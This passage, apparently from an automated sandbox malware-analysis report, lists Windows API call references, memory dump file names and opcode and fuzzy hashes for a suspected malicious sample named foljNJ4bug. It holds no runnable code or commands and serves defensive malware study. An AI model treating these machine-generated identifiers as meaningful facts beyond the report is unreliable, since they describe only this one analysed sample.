                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                                              • _memmove.LIBCMT ref: 0046D475
                                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2502553879-0
                                                                                                                                              • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                              • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                                              • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                              • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32 ref: 00448C69
                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$LongWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 312131281-0
                                                                                                                                              • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                              • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                                              • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                              • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                                              APIs
                                                                                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastacceptselect
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 385091864-0
                                                                                                                                              • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                              • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                                              • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                              • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                              • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                                              • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                              • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                                              APIs
                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1358664141-0
                                                                                                                                              • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                              • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                                              • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                              • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2880819207-0
                                                                                                                                              • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                              • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                                              • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                              • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                                              APIs
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                                              • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 357397906-0
                                                                                                                                              • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                              • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                                              • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                              • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                                              APIs
                                                                                                                                              • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                              • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                              • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                              • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1187119602-0
                                                                                                                                              • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                              • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                                              • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                              • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1597257046-0
                                                                                                                                              • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                                              • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                                              • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                                              • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                                                              APIs
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                                              • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 237123855-0
                                                                                                                                              • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                              • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                                                              • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                              • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349847261-0
                                                                                                                                              • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                              • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                                              • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                              • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2223660684-0
                                                                                                                                              • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                              • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                                              • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                              • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                                              • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                                              • EndPath.GDI32(?), ref: 00447336
                                                                                                                                              • StrokePath.GDI32(?), ref: 00447344
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2783949968-0
                                                                                                                                              • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                              • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                                              • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                              • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                                              APIs
                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                              • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2710830443-0
